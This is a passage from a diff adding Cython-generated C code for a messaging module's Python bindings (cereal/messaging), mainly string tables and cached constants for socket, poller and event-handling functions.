0, 1, 1}, + {&__pyx_kp_u_SIGINT_received_exiting, __pyx_k_SIGINT_received_exiting, sizeof(__pyx_k_SIGINT_received_exiting), 0, 1, 0, 0}, + {&__pyx_n_s_SocketEventHandle, __pyx_k_SocketEventHandle, sizeof(__pyx_k_SocketEventHandle), 0, 0, 1, 1}, + {&__pyx_n_s_SocketEventHandle___reduce_cytho, __pyx_k_SocketEventHandle___reduce_cytho, sizeof(__pyx_k_SocketEventHandle___reduce_cytho), 0, 0, 1, 1}, + {&__pyx_n_s_SocketEventHandle___setstate_cyt, __pyx_k_SocketEventHandle___setstate_cyt, sizeof(__pyx_k_SocketEventHandle___setstate_cyt), 0, 0, 1, 1}, + {&__pyx_n_s_SubSocket, __pyx_k_SubSocket, sizeof(__pyx_k_SubSocket), 0, 0, 1, 1}, + {&__pyx_n_s_SubSocket___reduce_cython, __pyx_k_SubSocket___reduce_cython, sizeof(__pyx_k_SubSocket___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_SubSocket___setstate_cython, __pyx_k_SubSocket___setstate_cython, sizeof(__pyx_k_SubSocket___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_SubSocket_connect, __pyx_k_SubSocket_connect, sizeof(__pyx_k_SubSocket_connect), 0, 0, 1, 1}, + {&__pyx_n_s_SubSocket_receive, __pyx_k_SubSocket_receive, sizeof(__pyx_k_SubSocket_receive), 0, 0, 1, 1}, + {&__pyx_n_s_SubSocket_setTimeout, __pyx_k_SubSocket_setTimeout, sizeof(__pyx_k_SubSocket_setTimeout), 0, 0, 1, 1}, + {&__pyx_n_s_TypeError, __pyx_k_TypeError, sizeof(__pyx_k_TypeError), 0, 0, 1, 1}, + {&__pyx_kp_u__2, __pyx_k__2, sizeof(__pyx_k__2), 0, 1, 0, 0}, + {&__pyx_n_s__5, __pyx_k__5, sizeof(__pyx_k__5), 0, 0, 1, 1}, + {&__pyx_n_s__53, __pyx_k__53, sizeof(__pyx_k__53), 0, 0, 1, 1}, + {&__pyx_n_s_address, __pyx_k_address, sizeof(__pyx_k_address), 0, 0, 1, 1}, + {&__pyx_n_s_all_readers_updated, __pyx_k_all_readers_updated, sizeof(__pyx_k_all_readers_updated), 0, 0, 1, 1}, + {&__pyx_n_s_asyncio_coroutines, __pyx_k_asyncio_coroutines, sizeof(__pyx_k_asyncio_coroutines), 0, 0, 1, 1}, + {&__pyx_n_s_cereal_messaging_messaging_pyx, __pyx_k_cereal_messaging_messaging_pyx, sizeof(__pyx_k_cereal_messaging_messaging_pyx), 0, 0, 1, 1}, + {&__pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_k_cereal_messaging_messaging_pyx_p, sizeof(__pyx_k_cereal_messaging_messaging_pyx_p), 0, 0, 1, 0}, + {&__pyx_n_s_clear, __pyx_k_clear, sizeof(__pyx_k_clear), 0, 0, 1, 1}, + {&__pyx_n_s_cline_in_traceback, __pyx_k_cline_in_traceback, sizeof(__pyx_k_cline_in_traceback), 0, 0, 1, 1}, + {&__pyx_n_s_conflate, __pyx_k_conflate, sizeof(__pyx_k_conflate), 0, 0, 1, 1}, + {&__pyx_n_s_connect, __pyx_k_connect, sizeof(__pyx_k_connect), 0, 0, 1, 1}, + {&__pyx_n_s_context, __pyx_k_context, sizeof(__pyx_k_context), 0, 0, 1, 1}, + {&__pyx_n_s_data, __pyx_k_data, sizeof(__pyx_k_data), 0, 0, 1, 1}, + {&__pyx_n_s_decode, __pyx_k_decode, sizeof(__pyx_k_decode), 0, 0, 1, 1}, + {&__pyx_n_s_delete_fake_prefix, __pyx_k_delete_fake_prefix, sizeof(__pyx_k_delete_fake_prefix), 0, 0, 1, 1}, + {&__pyx_n_s_dict, __pyx_k_dict, sizeof(__pyx_k_dict), 0, 0, 1, 1}, + {&__pyx_kp_u_disable, __pyx_k_disable, sizeof(__pyx_k_disable), 0, 1, 0, 0}, + {&__pyx_n_s_doc, __pyx_k_doc, sizeof(__pyx_k_doc), 0, 0, 1, 1}, + {&__pyx_kp_u_enable, __pyx_k_enable, sizeof(__pyx_k_enable), 0, 1, 0, 0}, + {&__pyx_n_s_enabled, __pyx_k_enabled, sizeof(__pyx_k_enabled), 0, 0, 1, 1}, + {&__pyx_n_s_endpoint, __pyx_k_endpoint, sizeof(__pyx_k_endpoint), 0, 0, 1, 1}, + {&__pyx_n_s_event, __pyx_k_event, sizeof(__pyx_k_event), 0, 0, 1, 1}, + {&__pyx_n_s_events, __pyx_k_events, sizeof(__pyx_k_events), 0, 0, 1, 1}, + {&__pyx_n_s_exit, __pyx_k_exit, sizeof(__pyx_k_exit), 0, 0, 1, 1}, + {&__pyx_kp_u_gc, __pyx_k_gc, sizeof(__pyx_k_gc), 0, 1, 0, 0}, + {&__pyx_n_s_get_fake_prefix, __pyx_k_get_fake_prefix, sizeof(__pyx_k_get_fake_prefix), 0, 0, 1, 1}, + {&__pyx_n_s_getstate, __pyx_k_getstate, sizeof(__pyx_k_getstate), 0, 0, 1, 1}, + {&__pyx_n_s_identifier, __pyx_k_identifier, sizeof(__pyx_k_identifier), 0, 0, 1, 1}, + {&__pyx_n_s_import, __pyx_k_import, sizeof(__pyx_k_import), 0, 0, 1, 1}, + {&__pyx_n_s_init, __pyx_k_init, sizeof(__pyx_k_init), 0, 0, 1, 1}, + {&__pyx_n_s_init_subclass, __pyx_k_init_subclass, sizeof(__pyx_k_init_subclass), 0, 0, 1, 1}, + {&__pyx_n_s_initializing, __pyx_k_initializing, sizeof(__pyx_k_initializing), 0, 0, 1, 1}, + {&__pyx_n_s_is_coroutine, __pyx_k_is_coroutine, sizeof(__pyx_k_is_coroutine), 0, 0, 1, 1}, + {&__pyx_kp_u_isenabled, __pyx_k_isenabled, sizeof(__pyx_k_isenabled), 0, 1, 0, 0}, + {&__pyx_n_s_items, __pyx_k_items, sizeof(__pyx_k_items), 0, 0, 1, 1}, + {&__pyx_n_s_length, __pyx_k_length, sizeof(__pyx_k_length), 0, 0, 1, 1}, + {&__pyx_n_s_m, __pyx_k_m, sizeof(__pyx_k_m), 0, 0, 1, 1}, + {&__pyx_n_s_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 0, 1, 1}, + {&__pyx_n_s_message, __pyx_k_message, sizeof(__pyx_k_message), 0, 0, 1, 1}, + {&__pyx_n_s_metaclass, __pyx_k_metaclass, sizeof(__pyx_k_metaclass), 0, 0, 1, 1}, + {&__pyx_n_s_module, __pyx_k_module, sizeof(__pyx_k_module), 0, 0, 1, 1}, + {&__pyx_n_s_mro_entries, __pyx_k_mro_entries, sizeof(__pyx_k_mro_entries), 0, 0, 1, 1}, + {&__pyx_n_s_msg, __pyx_k_msg, sizeof(__pyx_k_msg), 0, 0, 1, 1}, + {&__pyx_n_s_name, __pyx_k_name, sizeof(__pyx_k_name), 0, 0, 1, 1}, + {&__pyx_kp_s_no_default___reduce___due_to_non, __pyx_k_no_default___reduce___due_to_non, sizeof(__pyx_k_no_default___reduce___due_to_non), 0, 0, 1, 0}, + {&__pyx_n_s_non_blocking, __pyx_k_non_blocking, sizeof(__pyx_k_non_blocking), 0, 0, 1, 1}, + {&__pyx_n_s_override, __pyx_k_override, sizeof(__pyx_k_override), 0, 0, 1, 1}, + {&__pyx_n_s_peek, __pyx_k_peek, sizeof(__pyx_k_peek), 0, 0, 1, 1}, + {&__pyx_n_s_poll, __pyx_k_poll, sizeof(__pyx_k_poll), 0, 0, 1, 1}, + {&__pyx_n_s_prefix, __pyx_k_prefix, sizeof(__pyx_k_prefix), 0, 0, 1, 1}, + {&__pyx_n_s_prepare, __pyx_k_prepare, sizeof(__pyx_k_prepare), 0, 0, 1, 1}, + {&__pyx_n_s_print, __pyx_k_print, sizeof(__pyx_k_print), 0, 0, 1, 1}, + {&__pyx_n_s_ptr, __pyx_k_ptr, sizeof(__pyx_k_ptr), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_state, __pyx_k_pyx_state, sizeof(__pyx_k_pyx_state), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_vtable, __pyx_k_pyx_vtable, sizeof(__pyx_k_pyx_vtable), 0, 0, 1, 1}, + {&__pyx_n_s_qualname, __pyx_k_qualname, sizeof(__pyx_k_qualname), 0, 0, 1, 1}, + {&__pyx_n_s_r, __pyx_k_r, sizeof(__pyx_k_r), 0, 0, 1, 1}, + {&__pyx_n_s_receive, __pyx_k_receive, sizeof(__pyx_k_receive), 0, 0, 1, 1}, + {&__pyx_n_s_reduce, __pyx_k_reduce, sizeof(__pyx_k_reduce), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_cython, __pyx_k_reduce_cython, sizeof(__pyx_k_reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_ex, __pyx_k_reduce_ex, sizeof(__pyx_k_reduce_ex), 0, 0, 1, 1}, + {&__pyx_n_s_registerSocket, __pyx_k_registerSocket, sizeof(__pyx_k_registerSocket), 0, 0, 1, 1}, + {&__pyx_n_s_result, __pyx_k_result, sizeof(__pyx_k_result), 0, 0, 1, 1}, + {&__pyx_n_s_s, __pyx_k_s, sizeof(__pyx_k_s), 0, 0, 1, 1}, + {&__pyx_n_s_self, __pyx_k_self, sizeof(__pyx_k_self), 0, 0, 1, 1}, + {&__pyx_n_s_send, __pyx_k_send, sizeof(__pyx_k_send), 0, 0, 1, 1}, + {&__pyx_n_s_set, __pyx_k_set, sizeof(__pyx_k_set), 0, 0, 1, 1}, + {&__pyx_n_s_setTimeout, __pyx_k_setTimeout, sizeof(__pyx_k_setTimeout), 0, 0, 1, 1}, + {&__pyx_n_s_set_fake_prefix, __pyx_k_set_fake_prefix, sizeof(__pyx_k_set_fake_prefix), 0, 0, 1, 1}, + {&__pyx_n_s_set_name, __pyx_k_set_name, sizeof(__pyx_k_set_name), 0, 0, 1, 1}, + {&__pyx_n_s_setstate, __pyx_k_setstate, sizeof(__pyx_k_setstate), 0, 0, 1, 1}, + {&__pyx_n_s_setstate_cython, __pyx_k_setstate_cython, sizeof(__pyx_k_setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_socket, __pyx_k_socket, sizeof(__pyx_k_socket), 0, 0, 1, 1}, + {&__pyx_n_s_sockets, __pyx_k_sockets, sizeof(__pyx_k_sockets), 0, 0, 1, 1}, + {&__pyx_n_s_spec, __pyx_k_spec, sizeof(__pyx_k_spec), 0, 0, 1, 1}, + {&__pyx_kp_s_stringsource, __pyx_k_stringsource, sizeof(__pyx_k_stringsource), 0, 0, 1, 0}, + {&__pyx_n_s_suffix, __pyx_k_suffix, sizeof(__pyx_k_suffix), 0, 0, 1, 1}, + {&__pyx_n_s_super, __pyx_k_super, sizeof(__pyx_k_super), 0, 0, 1, 1}, + {&__pyx_n_s_sys, __pyx_k_sys, sizeof(__pyx_k_sys), 0, 0, 1, 1}, + {&__pyx_n_s_sz, __pyx_k_sz, sizeof(__pyx_k_sz), 0, 0, 1, 1}, + {&__pyx_n_s_t, __pyx_k_t, sizeof(__pyx_k_t), 0, 0, 1, 1}, + {&__pyx_n_s_term, __pyx_k_term, sizeof(__pyx_k_term), 0, 0, 1, 1}, + {&__pyx_n_s_test, __pyx_k_test, sizeof(__pyx_k_test), 0, 0, 1, 1}, + {&__pyx_n_s_timeout, __pyx_k_timeout, sizeof(__pyx_k_timeout), 0, 0, 1, 1}, + {&__pyx_n_s_toggle_fake_events, __pyx_k_toggle_fake_events, sizeof(__pyx_k_toggle_fake_events), 0, 0, 1, 1}, + {&__pyx_kp_u_utf_8, __pyx_k_utf_8, sizeof(__pyx_k_utf_8), 0, 1, 0, 0}, + {&__pyx_n_s_wait, __pyx_k_wait, sizeof(__pyx_k_wait), 0, 0, 1, 1}, + {&__pyx_n_s_wait_for_one_event, __pyx_k_wait_for_one_event, sizeof(__pyx_k_wait_for_one_event), 0, 0, 1, 1}, + {&__pyx_kp_u_with, __pyx_k_with, sizeof(__pyx_k_with), 0, 1, 0, 0}, + {0, 0, 0, 0, 0, 0, 0} + }; + return __Pyx_InitStrings(__pyx_string_tab); +} +/* #### Code section: cached_builtins ### */ +static CYTHON_SMALL_CODE int __Pyx_InitCachedBuiltins(void) { + __pyx_builtin_super = __Pyx_GetBuiltinName(__pyx_n_s_super); if (!__pyx_builtin_super) __PYX_ERR(0, 25, __pyx_L1_error) + __pyx_builtin_TypeError = __Pyx_GetBuiltinName(__pyx_n_s_TypeError); if (!__pyx_builtin_TypeError) __PYX_ERR(1, 2, __pyx_L1_error) + __pyx_builtin_print = __Pyx_GetBuiltinName(__pyx_n_s_print); if (!__pyx_builtin_print) __PYX_ERR(0, 204, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: cached_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitCachedConstants(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_InitCachedConstants", 0); + + /* "cereal/messaging/messaging_pyx.pyx":204 + * # If a blocking read returns no message check errno if SIGINT was caught in the C++ code + * if errno.errno == errno.EINTR: + * print("SIGINT received, exiting") # <<<<<<<<<<<<<< + * sys.exit(1) + * + */ + __pyx_tuple__4 = PyTuple_Pack(1, __pyx_kp_u_SIGINT_received_exiting); if (unlikely(!__pyx_tuple__4)) __PYX_ERR(0, 204, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__4); + __Pyx_GIVEREF(__pyx_tuple__4); + + /* "cereal/messaging/messaging_pyx.pyx":22 + * + * class MessagingError(Exception): + * def __init__(self, endpoint=None): # <<<<<<<<<<<<<< + * suffix = f"with {endpoint.decode('utf-8')}" if endpoint else "" + * message = f"Messaging failure {suffix}: {strerror(errno.errno).decode('utf-8')}" + */ + __pyx_tuple__6 = PyTuple_Pack(4, __pyx_n_s_self, __pyx_n_s_endpoint, __pyx_n_s_suffix, __pyx_n_s_message); if (unlikely(!__pyx_tuple__6)) __PYX_ERR(0, 22, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__6); + __Pyx_GIVEREF(__pyx_tuple__6); + __pyx_codeobj__7 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__6, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_init, 22, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__7)) __PYX_ERR(0, 22, __pyx_L1_error) + __pyx_tuple__8 = PyTuple_Pack(1, ((PyObject *)Py_None)); if (unlikely(!__pyx_tuple__8)) __PYX_ERR(0, 22, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__8); + __Pyx_GIVEREF(__pyx_tuple__8); + + /* "cereal/messaging/messaging_pyx.pyx":32 + * + * + * def toggle_fake_events(bool enabled): # <<<<<<<<<<<<<< + * cppSocketEventHandle.toggle_fake_events(enabled) + * + */ + __pyx_tuple__9 = PyTuple_Pack(1, __pyx_n_s_enabled); if (unlikely(!__pyx_tuple__9)) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__9); + __Pyx_GIVEREF(__pyx_tuple__9); + __pyx_codeobj__10 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__9, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_toggle_fake_events, 32, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__10)) __PYX_ERR(0, 32, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":36 + * + * + * def set_fake_prefix(string prefix): # <<<<<<<<<<<<<< + * cppSocketEventHandle.set_fake_prefix(prefix) + * + */ + __pyx_tuple__11 = PyTuple_Pack(1, __pyx_n_s_prefix); if (unlikely(!__pyx_tuple__11)) __PYX_ERR(0, 36, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__11); + __Pyx_GIVEREF(__pyx_tuple__11); + __pyx_codeobj__12 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__11, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_set_fake_prefix, 36, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__12)) __PYX_ERR(0, 36, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":40 + * + * + * def get_fake_prefix(): # <<<<<<<<<<<<<< + * return cppSocketEventHandle.fake_prefix() + * + */ + __pyx_codeobj__13 = (PyObject*)__Pyx_PyCode_New(0, 0, 0, 0, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_get_fake_prefix, 40, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__13)) __PYX_ERR(0, 40, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":44 + * + * + * def delete_fake_prefix(): # <<<<<<<<<<<<<< + * cppSocketEventHandle.set_fake_prefix(b"") + * + */ + __pyx_codeobj__14 = (PyObject*)__Pyx_PyCode_New(0, 0, 0, 0, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_delete_fake_prefix, 44, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__14)) __PYX_ERR(0, 44, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":48 + * + * + * def wait_for_one_event(list events, int timeout=-1): # <<<<<<<<<<<<<< + * cdef vector[cppEvent] items + * for event in events: + */ + __pyx_tuple__15 = PyTuple_Pack(4, __pyx_n_s_events, __pyx_n_s_timeout, __pyx_n_s_items, __pyx_n_s_event); if (unlikely(!__pyx_tuple__15)) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__15); + __Pyx_GIVEREF(__pyx_tuple__15); + __pyx_codeobj__16 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__15, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_wait_for_one_event, 48, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__16)) __PYX_ERR(0, 48, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":64 + * self.event = event + * + * def set(self): # <<<<<<<<<<<<<< + * self.event.set() + * + */ + __pyx_tuple__17 = PyTuple_Pack(1, __pyx_n_s_self); if (unlikely(!__pyx_tuple__17)) __PYX_ERR(0, 64, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__17); + __Pyx_GIVEREF(__pyx_tuple__17); + __pyx_codeobj__18 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__17, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_set, 64, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__18)) __PYX_ERR(0, 64, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":67 + * self.event.set() + * + * def clear(self): # <<<<<<<<<<<<<< + * return self.event.clear() + * + */ + __pyx_codeobj__19 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__17, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_clear, 67, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__19)) __PYX_ERR(0, 67, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":70 + * return self.event.clear() + * + * def wait(self, int timeout=-1): # <<<<<<<<<<<<<< + * self.event.wait(timeout) + * + */ + __pyx_tuple__20 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_timeout); if (unlikely(!__pyx_tuple__20)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__20); + __Pyx_GIVEREF(__pyx_tuple__20); + __pyx_codeobj__21 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__20, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_wait, 70, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__21)) __PYX_ERR(0, 70, __pyx_L1_error) + __pyx_tuple__22 = PyTuple_Pack(1, __pyx_int_neg_1); if (unlikely(!__pyx_tuple__22)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__22); + __Pyx_GIVEREF(__pyx_tuple__22); + + /* "cereal/messaging/messaging_pyx.pyx":73 + * self.event.wait(timeout) + * + * def peek(self): # <<<<<<<<<<<<<< + * return self.event.peek() + * + */ + __pyx_codeobj__23 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__17, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_peek, 73, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__23)) __PYX_ERR(0, 73, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_codeobj__24 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__17, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__24)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_tuple__25 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_pyx_state); if (unlikely(!__pyx_tuple__25)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__25); + __Pyx_GIVEREF(__pyx_tuple__25); + __pyx_codeobj__26 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__26)) __PYX_ERR(1, 3, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_codeobj__27 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__17, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__27)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_codeobj__28 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__28)) __PYX_ERR(1, 3, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":123 + * self.context = cppContext.create() + * + * def term(self): # <<<<<<<<<<<<<< + * del self.context + * self.context = NULL + */ + __pyx_codeobj__29 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__17, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_term, 123, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__29)) __PYX_ERR(0, 123, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_codeobj__30 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__17, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__30)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_codeobj__31 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__31)) __PYX_ERR(1, 3, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":145 + * del self.poller + * + * def registerSocket(self, SubSocket socket): # <<<<<<<<<<<<<< + * self.sub_sockets.append(socket) + * self.poller.registerSocket(socket.socket) + */ + __pyx_tuple__32 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_socket); if (unlikely(!__pyx_tuple__32)) __PYX_ERR(0, 145, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__32); + __Pyx_GIVEREF(__pyx_tuple__32); + __pyx_codeobj__33 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__32, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_registerSocket, 145, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__33)) __PYX_ERR(0, 145, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":149 + * self.poller.registerSocket(socket.socket) + * + * def poll(self, timeout): # <<<<<<<<<<<<<< + * sockets = [] + * cdef int t = timeout + */ + __pyx_tuple__34 = PyTuple_Pack(7, __pyx_n_s_self, __pyx_n_s_timeout, __pyx_n_s_sockets, __pyx_n_s_t, __pyx_n_s_result, __pyx_n_s_s, __pyx_n_s_socket); if (unlikely(!__pyx_tuple__34)) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__34); + __Pyx_GIVEREF(__pyx_tuple__34); + __pyx_codeobj__35 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 7, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__34, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_poll, 149, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__35)) __PYX_ERR(0, 149, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_codeobj__36 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, 